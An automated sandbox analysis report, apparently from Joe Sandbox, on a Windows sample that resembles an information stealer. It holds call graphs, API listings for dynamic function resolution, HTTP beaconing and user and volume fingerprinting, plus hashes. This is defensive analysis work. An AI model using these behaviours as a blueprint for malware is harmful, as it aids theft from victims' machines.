29763->29762 29764->29765 29766 8e6e26 12 API calls 29765->29766 29767 8e6f40 29765->29767 29766->29767 29768 8e6fbd 29767->29768 29769 8e6f49 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29767->29769 29770 8e6fc6 GetProcAddress GetProcAddress 29768->29770 29771 8e6ff1 29768->29771 29769->29768 29770->29771 29772 8e6ffa GetProcAddress GetProcAddress 29771->29772 29773 8e7025 29771->29773 29772->29773 29774 8e711d 29773->29774 29775 8e7032 10 API calls 29773->29775 29776 8e7126 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29774->29776 29777 8e7182 29774->29777 29775->29774 29776->29777 29778 8e719e 29777->29778 29779 8e718b GetProcAddress 29777->29779 29780 8e71a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29778->29780 29781 8e067a 29778->29781 29779->29778 29780->29781 29782 8c1410 29781->29782 30103 8c1510 29782->30103 29784 8c141b 29785 8c1435 lstrcpy 29784->29785 29786 8c143d 29784->29786 29785->29786 29787 8c1457 lstrcpy 29786->29787 29788 8c145f 29786->29788 29787->29788 29789 8c1479 lstrcpy 29788->29789 29791 8c1481 
29788->29791 29789->29791 29790 8c14e5 29793 8df300 lstrlen 29790->29793 29791->29790 29792 8c14dd lstrcpy 29791->29792 29792->29790 29794 8df33e 29793->29794 29795 8df346 lstrcpy 29794->29795 29796 8df352 lstrlen 29794->29796 29795->29796 29797 8df363 29796->29797 29798 8df36b lstrcpy 29797->29798 29799 8df377 lstrlen 29797->29799 29798->29799 29800 8df388 29799->29800 29801 8df390 lstrcpy 29800->29801 29802 8df39c 29800->29802 29801->29802 29803 8df3b8 lstrcpy 29802->29803 29804 8df3c4 29802->29804 29803->29804 29805 8df3e6 lstrcpy 29804->29805 29806 8df3f2 29804->29806 29805->29806 29807 8df41c lstrcpy 29806->29807 29808 8df428 29806->29808 29807->29808 29809 8df44e lstrcpy 29808->29809 29860 8df460 29808->29860 29809->29860 29810 8df46c lstrlen 29810->29860 29811 8df626 lstrcpy 29811->29860 29812 8df504 lstrcpy 29812->29860 29813 8df529 lstrcpy 29813->29860 29814 8df656 lstrcpy 29875 8df65e 29814->29875 29815 8c1410 8 API calls 29815->29875 29816 8defe0 28 API calls 29816->29860 29817 8df100 35 API calls 29817->29875 29818 8df5e0 lstrcpy 29818->29860 29819 8df70d lstrcpy 29819->29875 29820 8df88a StrCmpCA 29824 8e0061 29820->29824 29820->29860 29821 8df788 StrCmpCA 29821->29820 29821->29875 29822 8dfbcb StrCmpCA 29832 8dfff8 29822->29832 29822->29860 29823 8df8ba lstrlen 29823->29860 29825 8e0083 lstrlen 29824->29825 29827 8e007b lstrcpy 29824->29827 29831 8e009f 29825->29831 29826 8dff0b StrCmpCA 29830 8dff1f Sleep 29826->29830 29838 8dff35 29826->29838 29827->29825 29828 8df7be lstrcpy 29828->29875 29829 8dfbfb lstrlen 29829->29860 29830->29860 29836 8e00c0 lstrlen 29831->29836 29840 8e00b8 lstrcpy 29831->29840 29833 8e001a lstrlen 29832->29833 29834 8e0012 lstrcpy 29832->29834 29845 8e0036 29833->29845 29834->29833 29835 8dfa26 lstrcpy 29835->29860 29843 8e00dc 29836->29843 29837 8df8ed lstrcpy 29837->29860 29839 8dff57 lstrlen 29838->29839 29841 8dff4f lstrcpy 29838->29841 29852 8dff73 29839->29852 29840->29836 29841->29839 29842 8dfd66 lstrcpy 29842->29860 
29851 8e00fd 29843->29851 29854 8e00f5 lstrcpy 29843->29854 29844 8dfc2e lstrcpy 29844->29860 29846 8dff94 lstrlen 29845->29846 29848 8e004f lstrcpy 29845->29848 29861 8dffb0 29846->29861 29847 8df910 lstrcpy 29847->29860 29848->29846 29850 8dfa56 lstrcpy 29850->29875 29855 8c1510 4 API calls 29851->29855 29852->29846 29859 8dff8c lstrcpy 29852->29859 29853 8dfd96 lstrcpy 29853->29875 29854->29851 29877 8dffdd 29855->29877 29856 8df812 lstrcpy 29856->29875 29857 8dfc51 lstrcpy 29857->29860 29858 8c1410 8 API calls 29858->29860 29859->29846 29860->29810 29860->29811 29860->29812 29860->29813 29860->29814 29860->29816 29860->29818 29860->29820 29860->29822 29860->29823 29860->29826 29860->29829 29860->29835 29860->29837 29860->29842 29860->29844 29860->29847 29860->29850 29860->29853 29860->29857 29860->29858 29865 8df964 lstrcpy 29860->29865 29868 8dfca5 lstrcpy 29860->29868 29860->29875 29862 8dffd1 29861->29862 29863 8dffc9 lstrcpy 29861->29863 29864 8c1510 4 API calls 29862->29864 29863->29862 29864->29877 29865->29860 29866 8dfab5 lstrcpy 29866->29875 29867 8dfb30 StrCmpCA 29867->29822 29867->29875 29868->29860 29869 8dfdf5 lstrcpy 29869->29875 29870 8dfe70 StrCmpCA 29870->29826 29870->29875 29871 8dfb63 lstrcpy 29871->29875 29872 8dfea3 lstrcpy 29872->29875 29873 8defe0 28 API calls 29873->29875 29874 8dfbb7 lstrcpy 29874->29875 29875->29815 29875->29817 29875->29819 29875->29821 29875->29822 29875->29826 29875->29828 29875->29856 29875->29860 29875->29866 29875->29867 29875->29869 29875->29870 29875->29871 29875->29872 29875->29873 29875->29874 29876 8dfef7 lstrcpy 29875->29876 29876->29875 29877->28906 29880 8e735d 29878->29880 29879 8e737f 29879->28912 29880->29879 29881 8e736d lstrcpy lstrcat 29880->29881 29881->29879 29883 8e7216 29882->29883 29884 8e722c lstrcpy 29883->29884 29885 8e07f2 29883->29885 29884->29885 29886 8e26e0 GetWindowsDirectoryA 29885->29886 29887 8e272c GetVolumeInformationA 29886->29887 29888 8e2725 29886->29888 29890 8e278c 
GetProcessHeap RtlAllocateHeap 29887->29890 29888->29887 29891 8e27c6 wsprintfA 29890->29891 29892 8e27c2 29890->29892 29891->29892 29893 8e7210 lstrcpy 29892->29893 29894 8e07fb 29893->29894 29895 8e7240 29894->29895 29896 8e724c 29895->29896 29897 8e080b 29896->29897 29898 8e7258 lstrcpy 29896->29898 29899 8c4b80 29897->29899 29898->29897 29900 8c4ba0 29899->29900 29901 8c4bb5 29900->29901 29902 8c4bad lstrcpy 29900->29902 30113 8c4ae0 29901->30113 29902->29901 29904 8c4bc0 29905 8c4bfc lstrcpy 29904->29905 29906 8c4c08 29904->29906 29905->29906 29907 8c4c2f lstrcpy 29906->29907 29908 8c4c3b 29906->29908 29907->29908 29909 8c4c5f lstrcpy 29908->29909 29910 8c4c6b 29908->29910 29909->29910 29911 8c4c9d lstrcpy 29910->29911 29912 8c4ca9 29910->29912 29911->29912 29913 8c4cdc InternetOpenA StrCmpCA 29912->29913 29914 8c4cd0 lstrcpy 29912->29914 29915 8c4d10 29913->29915 29914->29913 29916 8c53e8 InternetCloseHandle CryptStringToBinaryA 29915->29916 30117 8e3e10 29915->30117 29917 8c5418 LocalAlloc 29916->29917 29934 8c5508 29916->29934 29919 8c542f CryptStringToBinaryA 29917->29919 29917->29934 29920 8c5459 lstrlen 29919->29920 29921 8c5447 LocalFree 29919->29921 29922 8c546d 29920->29922 29921->29934 29924 8c5487 lstrcpy 29922->29924 29925 8c5493 lstrlen 29922->29925 29923 8c4d2a 29926 8c4d53 lstrcpy lstrcat 29923->29926 29927 8c4d68 29923->29927 29924->29925 29929 8c54ad 29925->29929 29926->29927 29928 8c4d8a lstrcpy 29927->29928 29930 8c4d92 29927->29930 29928->29930 29931 8c54bf lstrcpy lstrcat 29929->29931 29932 8c54d2 29929->29932 29933 8c4da1 lstrlen 29930->29933 29931->29932 29935 8c5501 29932->29935 29937 8c54f9 lstrcpy 29932->29937 29936 8c4db9 29933->29936 29934->28930 29935->29934 29938 8c4dc5 lstrcpy lstrcat 29936->29938 29939 8c4ddc 29936->29939 29937->29935 29938->29939 29940 8c4e05 29939->29940 29941 8c4dfd lstrcpy 29939->29941 29942 8c4e0c lstrlen 29940->29942 29941->29940 29943 8c4e22 29942->29943 29944 8c4e2e lstrcpy lstrcat 29943->29944 29945 
8c4e45 29943->29945 29944->29945 29946 8c4e66 lstrcpy 29945->29946 29947 8c4e6e 29945->29947 29946->29947 29948 8c4e95 lstrcpy lstrcat 29947->29948 29949 8c4eab 29947->29949 29948->29949 29950 8c4ed4 29949->29950 29951 8c4ecc lstrcpy 29949->29951 29952 8c4edb lstrlen 29950->29952 29951->29950 29953 8c4ef1 29952->29953 29954 8c4efd lstrcpy lstrcat 29953->29954 29955 8c4f14 29953->29955 29954->29955 29956 8c4f3d 29955->29956 29957 8c4f35 lstrcpy 29955->29957 29958 8c4f44 lstrlen 29956->29958 29957->29956 29959 8c4f5a 29958->29959 29960 8c4f66 lstrcpy lstrcat 29959->29960 29961 8c4f7d 29959->29961 29960->29961 29962 8c4fa9 29961->29962 29963 8c4fa1 lstrcpy 29961->29963 29964 8c4fb0 lstrlen 29962->29964 29963->29962 29965 8c4fcb 29964->29965 29966 8c4fdc lstrcpy lstrcat 29965->29966 29967 8c4fec 29965->29967 29966->29967 29968 8c500a lstrcpy lstrcat 29967->29968 29969 8c501d 29967->29969 29968->29969 29970 8c503b lstrcpy 29969->29970 29971 8c5043 29969->29971 29970->29971 29972 8c5051 InternetConnectA 29971->29972 29972->29916 29973 8c5080 HttpOpenRequestA 29972->29973 29974 8c50bb 29973->29974 29975 8c53e1 InternetCloseHandle 29973->29975 29976 8e7340 3 API calls 29974->29976 29975->29916 29977 8c50cb 29976->29977 30124 8e72b0 29977->30124 29979 8c50d4 30128 8e72f0 29979->30128 29982 8e72b0 lstrcpy 29983 8c50f0 29982->29983 29984 8e7340 3 API calls 29983->29984 29985 8c5105 29984->29985 29986 8e72b0 lstrcpy 29985->29986 29987 8c510e 29986->29987 29988 8e7340 3 API calls 29987->29988 29989 8c5124 29988->29989 29990 8e72b0 lstrcpy 29989->29990 29991 8c512d 29990->29991 29992 8e7340 3 API calls 29991->29992 29993 8c5143 29992->29993 29994 8e72b0 lstrcpy 29993->29994 29995 8c514c 29994->29995 29996 8e7340 3 API calls 29995->29996 29997 8c5161 29996->29997 29998 8e72b0 lstrcpy 29997->29998 29999 8c516a 29998->29999 30000 8e72f0 2 API calls 29999->30000 30001 8c517d 30000->30001 30002 8e72b0 lstrcpy 30001->30002 30003 8c5186 30002->30003 30004 8e7340 3 API calls 
30003->30004 30005 8c519b 30004->30005 30006 8e72b0 lstrcpy 30005->30006 30007 8c51a4 30006->30007 30008 8e7340 3 API calls 30007->30008 30009 8c51b9 30008->30009 30010 8e72b0 lstrcpy 30009->30010 30011 8c51c2 30010->30011 30012 8e72f0 2 API calls 30011->30012 30013 8c51d5 30012->30013 30014 8e72b0 lstrcpy 30013->30014 30015 8c51de 30014->30015 30016 8e7340 3 API calls 30015->30016 30017 8c51f3 30016->30017 30018 8e72b0 lstrcpy 30017->30018 30019 8c51fc 30018->30019 30020 8e7340 3 API calls 30019->30020 30021 8c5212 30020->30021 30022 8e72b0 lstrcpy 30021->30022 30023 8c521b 30022->30023 30024 8e7340 3 API calls 30023->30024 30025 8c5231 30024->30025 30026 8e72b0 lstrcpy 30025->30026 30027 8c523a 30026->30027 30028 8e7340 3 API calls 30027->30028 30029 8c524f 30028->30029 30030 8e72b0 lstrcpy 30029->30030 30031 8c5258 30030->30031 30032 8e72f0 2 API calls 30031->30032 30033 8c526b 30032->30033 30034 8e72b0 lstrcpy 30033->30034 30035 8c5274 30034->30035 30036 8c52ac 30035->30036 30037 8c52a0 lstrcpy 30035->30037 30038 8e72f0 2 API calls 30036->30038 30037->30036 30039 8c52ba 30038->30039 30040 8e72f0 2 API calls 30039->30040 30041 8c52c7 30040->30041 30042 8e72b0 lstrcpy 30041->30042 30043 8c52d1 30042->30043 30044 8c52e1 lstrlen lstrlen HttpSendRequestA InternetReadFile 30043->30044 30045 8c53cc InternetCloseHandle 30044->30045 30049 8c5322 30044->30049 30047 8c53de 30045->30047 30046 8c532d lstrlen 30046->30049 30047->29975 30048 8c535e lstrcpy lstrcat 30048->30049 30049->30045 30049->30046 30049->30048 30050 8c53a3 30049->30050 30051 8c539b lstrcpy 30049->30051 30052 8c53aa InternetReadFile 30050->30052 30051->30050 30052->30045 30052->30049 30054 8d8d2d 30053->30054 30055 8d8d26 ExitProcess 30053->30055 30056 8d8f42 30054->30056 30057 8d8ecf StrCmpCA 30054->30057 30058 8d8ee8 lstrlen 30054->30058 30059 8d8de4 StrCmpCA 30054->30059 30060 8d8e04 StrCmpCA 30054->30060 30061 8d8d66 lstrlen 30054->30061 30062 8d8e1d StrCmpCA 30054->30062 30063 8d8e3d StrCmpCA 
30054->30063 30064 8d8e5d StrCmpCA 30054->30064 30065 8d8e7d StrCmpCA 30054->30065 30066 8d8e9d StrCmpCA 30054->30066 30067 8d8dba lstrlen 30054->30067 30068 8d8eb6 StrCmpCA 30054->30068 30069 8d8d90 lstrlen 30054->30069 30070 8d8f1b lstrcpy 30054->30070 30056->28932 30057->30054 30058->30054 30059->30054 30060->30054 30061->30054 30062->30054 30063->30054 30064->30054 30065->30054 30066->30054 30067->30054 30068->30054 30069->30054 30070->30054 30071->28938 30072->28940 30073->28946 30074->28948 30075->28954 30076->28956 30077->28962 30078->28966 30079->28972 30080->28974 30081->28978 30082->28993 30083->28996 30084->28994 30085->28990 30086->28994 30087->29011 30088->28997 30089->29000 30090->29002 30091->29008 30092->29013 30093->29015 30094->29023 30095->29025 30096->29049 30097->29052 30098->29055 30099->29048 30100->29055 30101->29062 30104 8c151f 30103->30104 30105 8c152b lstrcpy 30104->30105 30107 8c1533 30104->30107 30105->30107 30106 8c1555 30109 8c156f lstrcpy 30106->30109 30111 8c1577 30106->30111 30107->30106 30108 8c154d lstrcpy 30107->30108 30108->30106 30109->30111 30110 8c1599 30110->29784 30111->30110 30112 8c1591 lstrcpy 30111->30112 30112->30110 30114 8c4af0 30113->30114 30114->30114 30115 8c4af7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 30114->30115 30116 8c4b61 30115->30116 30116->29904 30118 8e3e23 30117->30118 30119 8e3e3f lstrcpy 30118->30119 30120 8e3e4b 30118->30120 30119->30120 30121 8e3e6d lstrcpy 30120->30121 30122 8e3e75 GetSystemTime 30120->30122 30121->30122 30123 8e3e93 30122->30123 30123->29923 30125 8e72bc 30124->30125 30126 8e72e4 30125->30126 30127 8e72dc lstrcpy 30125->30127 30126->29979 30127->30126 30130 8e730c 30128->30130 30129 8c50e7 30129->29982 30130->30129 30131 8e731d lstrcpy lstrcat 30130->30131 30131->30129 30138 8e30d0 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 30140 8cdf00 497 API calls 30198 8d86a6 47 API calls 30179 8de169 147 API calls 30141 8cbce9 90 API calls 
30142 8e08e8 1962 API calls 30143 8d8ce1 16 API calls 30160 8e3c60 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 30207 8e3360 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 30199 8d6ff9 138 API calls 30191 8c1a64 162 API calls 30200 8cb3f9 98 API calls 30161 8c9876 145 API calls __setmbcp_nolock 30201 8e27f3 lstrcpy 30163 8e2c70 GetUserDefaultLocaleName LocalAlloc CharToOemW
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C4BAF
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C4C02
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C4C35
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C4C65
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C4CA3
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C4CD6
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008C4CE6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------$HS$hS$pS
                                    • API String ID: 2041821634-3966598223
                                    • Opcode ID: e0d9a77e0c6683bde34d384bab552be20f4c5d142d6770db4cb40bb599e21c07
                                    • Instruction ID: 5147e61fe8e26bd5f424f86656c7d82f7c2b54843b3dd5554ccfab0fcc1f8efe
                                    • Opcode Fuzzy Hash: e0d9a77e0c6683bde34d384bab552be20f4c5d142d6770db4cb40bb599e21c07
                                    • Instruction Fuzzy Hash: 6F521B31901A169BDB20EBB8D845FAE7BB9FF44310F155028BA05EB251DF34ED46CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1467 8e63c0-8e63ed GetPEB 1468 8e65f3-8e6653 LoadLibraryA * 5 1467->1468 1469 8e63f3-8e65ee call 8e6320 GetProcAddress * 20 1467->1469 1471 8e6668-8e666f 1468->1471 1472 8e6655-8e6663 GetProcAddress 1468->1472 1469->1468 1474 8e669c-8e66a3 1471->1474 1475 8e6671-8e6697 GetProcAddress * 2 1471->1475 1472->1471 1476 8e66b8-8e66bf 1474->1476 1477 8e66a5-8e66b3 GetProcAddress 1474->1477 1475->1474 1479 8e66d4-8e66db 1476->1479 1480 8e66c1-8e66cf GetProcAddress 1476->1480 1477->1476 1481 8e66dd-8e6702 GetProcAddress * 2 1479->1481 1482 8e6707-8e670a 1479->1482 1480->1479 1481->1482
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,00532308), ref: 008E6419
                                    • GetProcAddress.KERNEL32(74DD0000,005324D0), ref: 008E6432
                                    • GetProcAddress.KERNEL32(74DD0000,00532500), ref: 008E644A
                                    • GetProcAddress.KERNEL32(74DD0000,00532218), ref: 008E6462
                                    • GetProcAddress.KERNEL32(74DD0000,00539128), ref: 008E647B
                                    • GetProcAddress.KERNEL32(74DD0000,005259D0), ref: 008E6493
                                    • GetProcAddress.KERNEL32(74DD0000,005258D0), ref: 008E64AB
                                    • GetProcAddress.KERNEL32(74DD0000,00532410), ref: 008E64C4
                                    • GetProcAddress.KERNEL32(74DD0000,00532230), ref: 008E64DC
                                    • GetProcAddress.KERNEL32(74DD0000,00532248), ref: 008E64F4
                                    • GetProcAddress.KERNEL32(74DD0000,00532470), ref: 008E650D
                                    • GetProcAddress.KERNEL32(74DD0000,00525A50), ref: 008E6525
                                    • GetProcAddress.KERNEL32(74DD0000,00532440), ref: 008E653D
                                    • GetProcAddress.KERNEL32(74DD0000,00532260), ref: 008E6556
                                    • GetProcAddress.KERNEL32(74DD0000,00525710), ref: 008E656E
                                    • GetProcAddress.KERNEL32(74DD0000,00532338), ref: 008E6586
                                    • GetProcAddress.KERNEL32(74DD0000,00532350), ref: 008E659F
                                    • GetProcAddress.KERNEL32(74DD0000,005256F0), ref: 008E65B7
                                    • GetProcAddress.KERNEL32(74DD0000,00532380), ref: 008E65CF
                                    • GetProcAddress.KERNEL32(74DD0000,00525790), ref: 008E65E8
                                    • LoadLibraryA.KERNEL32(00532518,?,?,?,008E1BE3), ref: 008E65F9
                                    • LoadLibraryA.KERNEL32(00532548,?,?,?,008E1BE3), ref: 008E660B
                                    • LoadLibraryA.KERNEL32(00532578,?,?,?,008E1BE3), ref: 008E661D
                                    • LoadLibraryA.KERNEL32(005325C0,?,?,?,008E1BE3), ref: 008E662E
                                    • LoadLibraryA.KERNEL32(00532590,?,?,?,008E1BE3), ref: 008E6640
                                    • GetProcAddress.KERNEL32(75A70000,00532560), ref: 008E665D
                                    • GetProcAddress.KERNEL32(75290000,005325A8), ref: 008E6679
                                    • GetProcAddress.KERNEL32(75290000,005325D8), ref: 008E6691
                                    • GetProcAddress.KERNEL32(75BD0000,00532530), ref: 008E66AD
                                    • GetProcAddress.KERNEL32(75450000,005256B0), ref: 008E66C9
                                    • GetProcAddress.KERNEL32(76E90000,00539278), ref: 008E66E5
                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 008E66FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: 0"S$0%S$8#S$@$S$H"S$H%S$NtQueryInformationProcess$P#S$PZR$`"S$`%S$p$S$x%S
                                    • API String ID: 2238633743-2404205871
                                    • Opcode ID: 4091d193d1ef518048ac2f29d7994a9f5b6c64279f58e465bb30499bbf26dc1c
                                    • Instruction ID: 45e0e4b8ec84443b8c68e3e89c6bf7a6bd7c5e9baa127c45a35ccbb86d1f7202
                                    • Opcode Fuzzy Hash: 4091d193d1ef518048ac2f29d7994a9f5b6c64279f58e465bb30499bbf26dc1c
                                    • Instruction Fuzzy Hash: 4CA12AB5A11200AFD754DFE5ED88B377BB9F788741300851AE916C3264EF78A842DF68

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2372 8c4980-8c4a1c RtlAllocateHeap 2389 8c4a1e-8c4a23 2372->2389 2390 8c4a9a-8c4ade VirtualProtect 2372->2390 2391 8c4a26-8c4a98 2389->2391 2391->2390
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C49C3
                                    • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 008C4AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-3329630956
                                    • Opcode ID: db9bd2f600e420e9a889fe7eada1fd6389c3319314ca1bee22129973d93c5e14
                                    • Instruction ID: eefe8598aee56f499fe0d50944a15180ff27b186de1801d4300d6f6435f5847e
                                    • Opcode Fuzzy Hash: db9bd2f600e420e9a889fe7eada1fd6389c3319314ca1bee22129973d93c5e14
                                    • Instruction Fuzzy Hash: 73310C10B8423E7E96206BB66C46D7FBED5FF46750B10A057F62CD5384CDA45508CAE2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2473 8e29e0-8e2a42 GetProcessHeap RtlAllocateHeap GetUserNameA
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 008E2A0F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E2A16
                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 008E2A2A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 5225c5ceac0f7a5c5e740420bfebcfba997cd7f0a475d817e2a978f4086d5df9
                                    • Instruction ID: e2f79d9401c55482769c6829947a1e7316210c45ab208a63357e9ea8600e6057
                                    • Opcode Fuzzy Hash: 5225c5ceac0f7a5c5e740420bfebcfba997cd7f0a475d817e2a978f4086d5df9
                                    • Instruction Fuzzy Hash: 75F090B1A40204ABC700DBC8DD49BAABBBCF744B25F000216F914E2680D7B8190486A1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
